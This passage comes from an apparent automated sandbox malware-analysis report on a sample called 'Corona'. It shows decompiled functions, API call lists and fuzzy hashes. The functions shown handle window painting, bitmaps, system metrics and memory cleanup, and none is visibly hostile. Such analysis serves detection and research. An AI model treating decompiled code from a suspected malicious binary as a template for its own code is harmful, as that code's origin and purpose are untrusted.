                                  • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0044BD66
                                  • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 0044BD7D
                                  • SetCursor.USER32(00000000), ref: 0044BD8F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                  • String ID:
                                  • API String ID: 1770779139-0
                                  • Opcode ID: 0fde572dc7bd514bfb24d7e8d55c711b9f5b90b1065fa8b67d8fa167bd07cd70
                                  • Instruction ID: c4255c0a7a29947a3f7894671162d43242d64d0068fab69f319d93a70231aa58
                                  • Opcode Fuzzy Hash: 0fde572dc7bd514bfb24d7e8d55c711b9f5b90b1065fa8b67d8fa167bd07cd70
                                  • Instruction Fuzzy Hash: 0101886220064035EA2437794C86F7F2568DB81759F11057FB915BA1C3EA3ECC1096AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00447864, Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E00447864(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t127 = __ebx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
					}
					_push(_t150);
					_push(0x447a32);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x254),  &_v96);
						E0042E338(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						E0042D130( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E00432BA8(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0x447a40);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x254),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E0041CC2C( *((intOrPtr*)(_v8 + 0x170)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
							GetClientRect( *(_v8 + 0x254),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E0041CC2C( *((intOrPtr*)(_v8 + 0x170))));
						}
						_t105 = _v12;
						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E004477D8(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x22f)) == 2) {
								if(E00447D00(_v8) == 0 || E00447824(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E00444B44( *(_v8 + 0x254), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E004477D8(_t150);
							} else {
								E004477D8(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

























                                  0x00447864
                                  0x00447864
                                  0x00447864
                                  0x00447864
                                  0x00447865
                                  0x00447867
                                  0x0044786a
                                  0x0044786d
                                  0x00447875
                                  0x00447878
                                  0x00447988
                                  0x0044798f
                                  0x004479a7
                                  0x004479a7
                                  0x004479ac
                                  0x004479ad
                                  0x004479b2
                                  0x004479b5
                                  0x004479bc
                                  0x004479cc
                                  0x004479da
                                  0x004479e2
                                  0x004479e8
                                  0x004479fb
                                  0x004479fb
                                  0x00447a06
                                  0x00447a0d
                                  0x00447a10
                                  0x00447a13
                                  0x00447a1c
                                  0x00000000
                                  0x00447a2c
                                  0x00447a31
                                  0x0044787e
                                  0x0044787e
                                  0x00447881
                                  0x004478c1
                                  0x004478cf
                                  0x004478dd
                                  0x004478ec
                                  0x00447908
                                  0x00447927
                                  0x00447927
                                  0x0044792c
                                  0x0044792f
                                  0x00447883
                                  0x00447883
                                  0x00447886
                                  0x0044793c
                                  0x00447942
                                  0x0044794c
                                  0x0044795c
                                  0x0044796d
                                  0x00447969
                                  0x00447969
                                  0x00447969
                                  0x00447978
                                  0x00447978
                                  0x0044788c
                                  0x0044788f
                                  0x00447a3a
                                  0x00447895
                                  0x00447896
                                  0x0044789c
                                  0x004478a3
                                  0x004478a9
                                  0x004478ac
                                  0x004478ac
                                  0x004478a3
                                  0x0044788f
                                  0x00447886
                                  0x00447a43
                                  0x00447a43

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                  • String ID:
                                  • API String ID: 901200654-0
                                  • Opcode ID: 22ceeaf33f644c6fa7c81e48bf9621237c13f35976eec21b1eb32dd00c2e106f
                                  • Instruction ID: 8971948cc4d806393b0500a7b3897a3fb005e959a782c2334ea829d098770f3e
                                  • Opcode Fuzzy Hash: 22ceeaf33f644c6fa7c81e48bf9621237c13f35976eec21b1eb32dd00c2e106f
                                  • Instruction Fuzzy Hash: 41511D74A04108EFDB00DFA9C589E9EB7F8AF08314F5581A6E405EB352D738AE46DF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041E104, Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E0041E104(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed short _v44;
				int _t36;
				signed int _t37;
				signed short _t38;
				signed int _t39;
				signed short _t43;
				signed int* _t47;
				signed int _t51;
				intOrPtr _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t47 = _a8;
				_v24 = _v16 << 4;
				_v20 = E004078A0(_v24, __eflags);
				 *[fs:edx] = _t70;
				_t51 = _v24;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x41e3fb, _t68, __edi, __esi, __ebx, _t67);
				if(( *_t47 | _t47[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t47;
					 *(_t36 + 4) = _t47[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_t36 = GetSystemMetrics(0xc);
					 *(_a4 + 4) = _t36;
				}
				_push(0);
				L0040638C();
				_v44 = _t36;
				if(_v44 == 0) {
					E0041D5C8(_t51);
				}
				_push(_t68);
				_push(0x41e1ed);
				_push( *[fs:edx]);
				 *[fs:edx] = _t70;
				_push(0xe);
				_t37 = _v44;
				_push(_t37);
				L004060D4();
				_push(0xc);
				_t38 = _v44;
				_push(_t38);
				L004060D4();
				_t39 = _t37 * _t38;
				if(_t39 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t39;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0041E1F4);
				_t43 = _v44;
				_push(_t43);
				_push(0);
				L004065C4();
				return _t43;
			}






















                                  0x0041e105
                                  0x0041e107
                                  0x0041e10d
                                  0x0041e110
                                  0x0041e113
                                  0x0041e116
                                  0x0041e11f
                                  0x0041e12a
                                  0x0041e138
                                  0x0041e13e
                                  0x0041e146
                                  0x0041e14e
                                  0x0041e16b
                                  0x0041e170
                                  0x0041e175
                                  0x0041e150
                                  0x0041e15a
                                  0x0041e15e
                                  0x0041e166
                                  0x0041e166
                                  0x0041e178
                                  0x0041e17a
                                  0x0041e17f
                                  0x0041e186
                                  0x0041e188
                                  0x0041e188
                                  0x0041e18f
                                  0x0041e190
                                  0x0041e195
                                  0x0041e198
                                  0x0041e19b
                                  0x0041e19d
                                  0x0041e1a0
                                  0x0041e1a1
                                  0x0041e1a8
                                  0x0041e1aa
                                  0x0041e1ad
                                  0x0041e1ae
                                  0x0041e1b7
                                  0x0041e1bd
                                  0x0041e1cf
                                  0x0041e1d1
                                  0x0041e1bf
                                  0x0041e1bf
                                  0x0041e1bf
                                  0x0041e1d6
                                  0x0041e1d9
                                  0x0041e1dc
                                  0x0041e1e1
                                  0x0041e1e4
                                  0x0041e1e5
                                  0x0041e1e7
                                  0x0041e1ec

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 0041E152
                                  • GetSystemMetrics.USER32 ref: 0041E15E
                                  • 72E7AC50.USER32(00000000), ref: 0041E17A
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0041E1ED,?,00000000), ref: 0041E1A1
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041E1ED,?,00000000), ref: 0041E1AE
                                  • 72E7B380.USER32(00000000,00000000,0041E1F4,0000000E,00000000,0041E1ED,?,00000000), ref: 0041E1E7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$B380
                                  • String ID:
                                  • API String ID: 3145338429-0
                                  • Opcode ID: ced4139a3b48ac1bab229ba180c4525aa6dc2c949b7a5ea856ff5f0b05076801
                                  • Instruction ID: d60c1852d40d5350a87500709d2e6a49ab3bfc6eca5313e77627c143b7621f43
                                  • Opcode Fuzzy Hash: ced4139a3b48ac1bab229ba180c4525aa6dc2c949b7a5ea856ff5f0b05076801
                                  • Instruction Fuzzy Hash: 02314374A00204EFEB00DF66C881ADEBBF5FB49710F118566F915AB381C6789D41CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041E574, Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 45%
                                  			E0041E574(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E0041E424(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L0040603C();
				_v16 = 0;
				_push(_t46);
				_push(0x41e611);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L0040619C();
					_v12 = _t29;
					_push(_v16);
					L0040616C();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(0x41e618);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L0040619C();
				}
				return DeleteDC(_v16);
			}











                                  0x0041e57d
                                  0x0041e581
                                  0x0041e58a
                                  0x0041e591
                                  0x0041e594
                                  0x0041e596
                                  0x0041e59b
                                  0x0041e5a0
                                  0x0041e5a1
                                  0x0041e5a6
                                  0x0041e5a9
                                  0x0041e5ae
                                  0x0041e5b0
                                  0x0041e5b2
                                  0x0041e5b3
                                  0x0041e5b6
                                  0x0041e5b7
                                  0x0041e5bc
                                  0x0041e5c2
                                  0x0041e5c3
                                  0x0041e5c3
                                  0x0041e5e1
                                  0x0041e5e7
                                  0x0041e5ea
                                  0x0041e5ed
                                  0x0041e5f6
                                  0x0041e5f8
                                  0x0041e5fd
                                  0x0041e601
                                  0x0041e602
                                  0x0041e602
                                  0x0041e610

                                  APIs
                                    • Part of subcall function 0041E424: GetObjectA.GDI32(?,00000054), ref: 0041E438
                                  • 72E7A590.GDI32(00000000), ref: 0041E596
                                  • 72E7B410.GDI32(?,?,00000000,00000000,0041E611,?,00000000), ref: 0041E5B7
                                  • 72E7B150.GDI32(?,?,?,00000000,00000000,0041E611,?,00000000), ref: 0041E5C3
                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041E5DA
                                  • 72E7B410.GDI32(?,00000000,00000000,0041E618,?,00000000), ref: 0041E602
                                  • DeleteDC.GDI32(?), ref: 0041E60B
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: B410$A590B150BitsDeleteObject
                                  • String ID:
                                  • API String ID: 3837315262-0
                                  • Opcode ID: b70a1ced80fcf729e647f38ab0b64e788c29f3460074b455ae73bd8ab028e24f
                                  • Instruction ID: 098dd08112c77945fff4872e51cc9bd5b70d39cc5584085f1824174f218af38d
                                  • Opcode Fuzzy Hash: b70a1ced80fcf729e647f38ab0b64e788c29f3460074b455ae73bd8ab028e24f
                                  • Instruction Fuzzy Hash: 3C119475E00204BFEB10DBAACC41F9EB7FCEF49710F514466B914E7281D679A9508768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401AC0, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E00401AC0() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4525c0 == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401B96);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x452049 != 0) {
						_push(0x4525c8);
						L00401358();
					}
					 *0x4525c0 = 0;
					_t3 =  *0x452620; // 0x5bca20
					LocalFree(_t3);
					 *0x452620 = 0;
					_t19 =  *0x4525e8; // 0x5ba96c
					while(_t19 != 0x4525e8) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E004013C0(0x4525e8);
					E004013C0(0x4525f8);
					E004013C0(0x452624);
					_t14 =  *0x4525e0; // 0x5ba338
					while(_t14 != 0) {
						 *0x4525e0 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4525e0; // 0x5ba338
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401b9d);
					if( *0x452049 != 0) {
						_push(0x4525c8);
						L00401360();
					}
					_push(0x4525c8);
					L00401368();
					return 0;
				}
			}










                                  0x00401ac1
                                  0x00401acb
                                  0x00401b9f
                                  0x00401ad1
                                  0x00401ad3
                                  0x00401ad4
                                  0x00401ad9
                                  0x00401adc
                                  0x00401ae6
                                  0x00401ae8
                                  0x00401aed
                                  0x00401aed
                                  0x00401af2
                                  0x00401af9
                                  0x00401aff
                                  0x00401b06
                                  0x00401b0b
                                  0x00401b25
                                  0x00401b1e
                                  0x00401b23
                                  0x00401b23
                                  0x00401b32
                                  0x00401b3c
                                  0x00401b46
                                  0x00401b4b
                                  0x00401b52
                                  0x00401b56
                                  0x00401b5d
                                  0x00401b62
                                  0x00401b67
                                  0x00401b6d
                                  0x00401b70
                                  0x00401b73
                                  0x00401b7f
                                  0x00401b81
                                  0x00401b86
                                  0x00401b86
                                  0x00401b8b
                                  0x00401b90
                                  0x00401b95
                                  0x00401b95

                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(004525C8,00000000,00401B96), ref: 00401AED
                                  • LocalFree.KERNEL32(005BCA20,00000000,00401B96), ref: 00401AFF
                                  • VirtualFree.KERNEL32(?,00000000,00008000,005BCA20,00000000,00401B96), ref: 00401B1E
                                  • LocalFree.KERNEL32(005BA338,?,00000000,00008000,005BCA20,00000000,00401B96), ref: 00401B5D
                                  • RtlLeaveCriticalSection.KERNEL32(004525C8,00401B9D,005BCA20,00000000,00401B96), ref: 00401B86
                                  • RtlDeleteCriticalSection.KERNEL32(004525C8,00401B9D,005BCA20,00000000,00401B96), ref: 00401B90
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                  • String ID:
                                  • API String ID: 3782394904-0
                                  • Opcode ID: bb85964cfbc20ae3488e472ef02cc62e6f756c390864ca4dab8b7814003cca96
                                  • Instruction ID: 960d2cca53614bd8d337a069f5bbc476030b35e8722ed236f2fd793f7ecd5be6
                                  • Opcode Fuzzy Hash: bb85964cfbc20ae3488e472ef02cc62e6f756c390864ca4dab8b7814003cca96
                                  • Instruction Fuzzy Hash: 7D1181706007486AE715AB659EA5B1A37E4A747705F5040BBF800B66F3F7BCE844C72C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042B5E8, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0042B5E8(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x4509d4; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x4509d4; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x4509d4; // 0x0
				SetPropA(_a4,  *0x452b1e & 0x0000ffff, _t27);
				_t31 =  *0x4509d4; // 0x0
				SetPropA(_a4,  *0x452b1c & 0x0000ffff, _t31);
				_t35 =  *0x4509d4; // 0x0
				 *0x4509d4 = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










                                  0x0042b5ed
                                  0x0042b5f0
                                  0x0042b5f8
                                  0x0042b5fe
                                  0x0042b610
                                  0x0042b625
                                  0x0042b640
                                  0x0042b640
                                  0x0042b645
                                  0x0042b657
                                  0x0042b65c
                                  0x0042b66e
                                  0x0042b67f
                                  0x0042b684
                                  0x0042b694
                                  0x0042b69c

                                  APIs
                                  • SetWindowLongA.USER32 ref: 0042B610
                                  • GetWindowLongA.USER32 ref: 0042B61B
                                  • GetWindowLongA.USER32 ref: 0042B62D
                                  • SetWindowLongA.USER32 ref: 0042B640
                                  • SetPropA.USER32(?,00000000,00000000), ref: 0042B657
                                  • SetPropA.USER32(?,00000000,00000000), ref: 0042B66E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: LongWindow$Prop
                                  • String ID:
                                  • API String ID: 3887896539-0
                                  • Opcode ID: 1fc2afac5e52ccdc58abee8b739a76f62d9f5c348bbc83186e4914bfd283a1f8
                                  • Instruction ID: 4ad74bcecd084e75270380c8ad4262c5f75faf3744fa78d4ad26d46307667cb5
                                  • Opcode Fuzzy Hash: 1fc2afac5e52ccdc58abee8b739a76f62d9f5c348bbc83186e4914bfd283a1f8
                                  • Instruction Fuzzy Hash: 85111FB6100214BFDB00DF99DD84EAA37E8EB08355F104626BD18EB2A6D735E9508B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041DDB4, Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E0041DDB4(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E004028B8(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L0040603C();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E0041DD1C(_t32) == 0) {
						E0041DBAC( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L00406064();
					_t31 = _t15;
				}
				return _t31;
			}













                                  0x0041ddbf
                                  0x0041ddc1
                                  0x0041ddc9
                                  0x0041de03
                                  0x0041de11
                                  0x0041ddcb
                                  0x0041ddcb
                                  0x0041ddcd
                                  0x0041ddd2
                                  0x0041ddd6
                                  0x0041ddef
                                  0x0041ddf6
                                  0x0041ddfc
                                  0x0041ddfc
                                  0x0041de1c
                                  0x0041de24
                                  0x0041de3a
                                  0x0041de3a
                                  0x0041de3f
                                  0x0041de41
                                  0x0041de42
                                  0x0041de47
                                  0x0041de47
                                  0x0041de54

                                  APIs
                                  • 72E7A590.GDI32(00000000,00000000,?,?,00421967,?,?,?,?,00420553,00000000,004205DF), ref: 0041DDCD
                                  • SelectObject.GDI32(00000000,00000000), ref: 0041DDD6
                                  • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00421967,?,?,?,?,00420553), ref: 0041DDEA
                                  • SelectObject.GDI32(00000000,00000000), ref: 0041DDF6
                                  • DeleteDC.GDI32(00000000), ref: 0041DDFC
                                  • 72E7A8F0.GDI32(?,00000000,?,?,00421967,?,?,?,?,00420553,00000000,004205DF), ref: 0041DE42
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$A590ColorDeleteTable
                                  • String ID:
                                  • API String ID: 1056449717-0
                                  • Opcode ID: f992d6c6bc59729f5a2660d779ae015ce8fe77aa21328a5181f99c61690b67c6
                                  • Instruction ID: 9cfb4d766d4d1ed9fdfc398e0b59d838b5d01a464858c76b33e8982fc98dbb18
                                  • Opcode Fuzzy Hash: f992d6c6bc59729f5a2660d779ae015ce8fe77aa21328a5181f99c61690b67c6
                                  • Instruction Fuzzy Hash: 2F019BB160431061E610B72A8C47AAB72F88FC0715F01C92FB589AB2C2E67D8845836E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041D498, Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041D498(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041CC2C( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041CC2C( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041CD0C( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041BF6C(E0041CBF0( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041BF6C(E0041CBF0( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}




                                  0x0041d499
                                  0x0041d4a4
                                  0x0041d4b6
                                  0x0041d4c5
                                  0x0041d4ff
                                  0x0041d510
                                  0x0041d4c7
                                  0x0041d4d9
                                  0x0041d4ea
                                  0x0041d4ea

                                  APIs
                                    • Part of subcall function 0041CC2C: CreateBrushIndirect.GDI32(?), ref: 0041CCD6
                                  • UnrealizeObject.GDI32(00000000), ref: 0041D4A4
                                  • SelectObject.GDI32(?,00000000), ref: 0041D4B6
                                  • SetBkColor.GDI32(?,00000000), ref: 0041D4D9
                                  • SetBkMode.GDI32(?,00000002), ref: 0041D4E4
                                  • SetBkColor.GDI32(?,00000000), ref: 0041D4FF
                                  • SetBkMode.GDI32(?,00000001), ref: 0041D50A
                                    • Part of subcall function 0041BF6C: GetSysColor.USER32(?), ref: 0041BF76
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                  • String ID:
                                  • API String ID: 3527656728-0
